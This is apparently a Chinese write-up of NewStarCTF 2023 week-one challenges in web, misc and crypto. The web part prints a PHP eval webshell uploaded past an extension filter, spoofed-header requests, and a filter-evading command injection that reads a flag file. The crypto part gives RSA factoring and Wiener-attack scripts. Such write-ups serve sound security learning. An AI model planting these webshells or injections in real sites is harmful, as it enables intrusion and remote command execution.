NewStarCTF 2023
第一周
Web
泄漏的秘密
直接猜测是不是泄露的 www.zip
下载打开后即是 flag
Begin of Upload
文件上传,随便上传一个一句话木马试试
前端过滤了后缀名
上传 png 然后 bp 抓包改后缀名
得到路径 Uploaded File: /upload/1.php
蚁剑连接得 flag
一句话木马:<?php @eval($_POST['shell']);?>
Begin of HTTP
根据提示一步步改 http 请求头即可
值得说明的是这里本地得用 X-Real-IP:127.0.0.1
POST /?ctf=1 HTTP/1.1
Host: node4.buuoj.cn:25546
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: NewStarCTF2023
Referer: newstarctf.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: power=ctfer
Content-Type: application/x-www-form-urlencoded
Connection: close
Content-Length: 28
X-Real-IP: 127.0.0.1
secret=n3wst4rCTF2023g00000dErrorFlask
让我们传 number1 和 number2, 随便传引发报错
number1=1&number=a
Begin of PHP
level1 和 level2 都可以通过数组绕过,level3 中 strcmp 会将传进来得数组返回 0,level4 可以用 %00 阶段绕过,从而不影响比较,level5 则是随便传一个未过滤得字符即可。
http://57773d22-93ca-486d-9a55-4619819d247f.node4.buuoj.cn:81/?key1[]=1&key2[]=2&key4[]=1&key5=2024%00
post 传参:key3[]=_&flag5=^R!C!E!
md5 碰撞与变量名以及关键字绕过
echo 得内容要加反引号,这里写 markdown 就不加了
password=v9BTpRL3pLSlBA3pID9b&e[v.a.l=echo c\at /fl\ag;
EasyLogin
随便注册登录账户,会发现一个 302 跳转,里面给了一个假得 flag。
而登录得时候又提示弱密码爆破,猜测是爆破 admin 账户的弱密码
最后尝试出来是 000000
然后登录看 admin 的 302 跳转
得到 flag
Misc
CyberChef's Secret
文件里的编码扔进 CyberChef 里就能出答案
机密图片
给的二维码扫出来啥也没有
最后试了试 zsteg
流量!鲨鱼!
打开流量包发现都是 404 请求,过滤查找 200 请求。
发现一个 base64
解密得到 flag
压缩包们
给出一个莫名其妙的文件,winhex 查看发现没有文件头,改文件头为 504B0304
然后根据 base 解密出来的提示去爆破六位数字密码。
我这里显示压缩包错误,懒得去下容错率高的压缩包了,原理很简单,知道原理就可以了。
空白格
WhiteSpace 语言,扔进网站得到 flag
https://vii5ard.github.io/whitespace/
隐秘的眼睛
学了个新工具:SilentEye
直接扔进去解密就行
Crypto
brainfuck
扔进网站解密
https://www.splitbrain.org/services/ook
Caesar's Secert
根据题目猜测凯撒密码
枚举出结果 (后来测试过,偏移量为 5)
Fence
栅栏密码解密
Vigenère
维尼吉亚解密
不知道密钥,但是猜测密文前四个应该对应 flag,观察得出密钥为 kfc
babyencoding
三部分密码, 前两个可以直接在密码大厨里得到
第三个学到了,是 UUencode 编码
拼接得到 flag
babyrsa
需要提前了解一下 rsa 的原理
可以看到 n 是由 15 个素数之积得来
于是 n 可以进行分解:
http://www.factordb.com/index.php
之后写脚本得出答案就可以
from Crypto.Util.number import *
n=17290066070594979571009663381214201320459569851358502368651245514213538229969915658064992558167323586895088933922835353804055772638980251328261
c=14322038433761655404678393568158537849783589481463521075694802654611048898878605144663750410655734675423328256213114422929994037240752995363595
factor=[2217990919,2338725373,2370292207,2463878387,2706073949,2794985117,2804303069,2923072267,2970591037,3207148519,3654864131,3831680819,3939901243,4093178561,4278428893]
phi=1
e=65537
for i in factor:
phi*=i-1
d=inverse(e,phi)
m=pow(c,d,n)
print(long_to_bytes(m))
#b'flag{us4_s1ge_t0_cal_phI}'Small d
新知识 get!!!
e 很大 d 很小的话,是低解密指数攻击
脚本如下:
import gmpy2
from Crypto.Util.number import *
c = 6755916696778185952300108824880341673727005249517850628424982499865744864158808968764135637141068930913626093598728925195859592078242679206690525678584698906782028671968557701271591419982370839581872779561897896707128815668722609285484978303216863236997021197576337940204757331749701872808443246927772977500576853559531421931943600185923610329322219591977644573509755483679059951426686170296018798771243136530651597181988040668586240449099412301454312937065604961224359235038190145852108473520413909014198600434679037524165523422401364208450631557380207996597981309168360160658308982745545442756884931141501387954248
e = 8614531087131806536072176126608505396485998912193090420094510792595101158240453985055053653848556325011409922394711124558383619830290017950912353027270400567568622816245822324422993074690183971093882640779808546479195604743230137113293752897968332220989640710311998150108315298333817030634179487075421403617790823560886688860928133117536724977888683732478708628314857313700596522339509581915323452695136877802816003353853220986492007970183551041303875958750496892867954477510966708935358534322867404860267180294538231734184176727805289746004999969923736528783436876728104351783351879340959568183101515294393048651825
n = 19873634983456087520110552277450497529248494581902299327237268030756398057752510103012336452522030173329321726779935832106030157682672262548076895370443461558851584951681093787821035488952691034250115440441807557595256984719995983158595843451037546929918777883675020571945533922321514120075488490479009468943286990002735169371404973284096869826357659027627815888558391520276866122370551115223282637855894202170474955274129276356625364663165723431215981184996513023372433862053624792195361271141451880123090158644095287045862204954829998614717677163841391272754122687961264723993880239407106030370047794145123292991433
def continuedFra(x, y):
cF = []
while y:
cF.append(x // y)
x, y = y, x % y
return cF
def Simplify(ctnf):
numerator = 0
denominator = 1
for x in ctnf[::-1]:
numerator, denominator = denominator, x * denominator + numerator
return (numerator, denominator)
def calculateFrac(x, y):
cF = continuedFra(x, y)
cF = list(map(Simplify, (cF[0:i] for i in range(1, len(cF)))))
return cF
def solve_pq(a, b, c):
par = gmpy2.isqrt(b * b - 4 * a * c)
return (-b + par) // (2 * a), (-b - par) // (2 * a)
def wienerAttack(e, n):
for (d, k) in calculateFrac(e, n):
print(e)
print(d)
print(k)
if k == 0:
continue
if (e * d - 1) % k != 0:
continue
phi = (e * d - 1) // k
p, q = solve_pq(1, n - phi + 1, n)
if p * q == n:
return abs(int(p)), abs(int(q))
print('[!]not find!')
return None, None
def wienerAttackMain(n, e, c):
p, q = wienerAttack(e, n)
print('[+]Found!')
print(' [-]p =',p)
print(' [-]q =',q)
print(' [-]n =',p*q)
d = gmpy2.invert(e,(p-1)*(q-1))
print(' [-]d =', d)
m = pow(c,d,p*q)
print(' [-]m =',m)
print(' [-]flag =',long_to_bytes(m))
print('[!]All Done!')
return m
wienerAttackMain(n,e,c)
#flag = b'flag{learn_some_continued_fraction_technique#dc16885c}'babyxor
看了下椰奶师傅的 wp
利用异或的特性,a^b^b=a, 可以猜测一下答案以 flag 开头
利用一下可以得到 key
cipher='e9e3eee8f4f7bffdd0bebad0fcf6e2e2bcfbfdf6d0eee1ebd0eabbf5f6aeaeaeaeaeaef2'
cipher=bytes.fromhex(cipher)
print(cipher)
#查看 key
for i in range(4):
print(b'flag'[i]^cipher[i])
flag = [143 ^ i for i in cipher]
print(bytes(flag))
#b'flag{x0r_15_symm3try_and_e4zy!!!!!!}'
emoji
写得好啊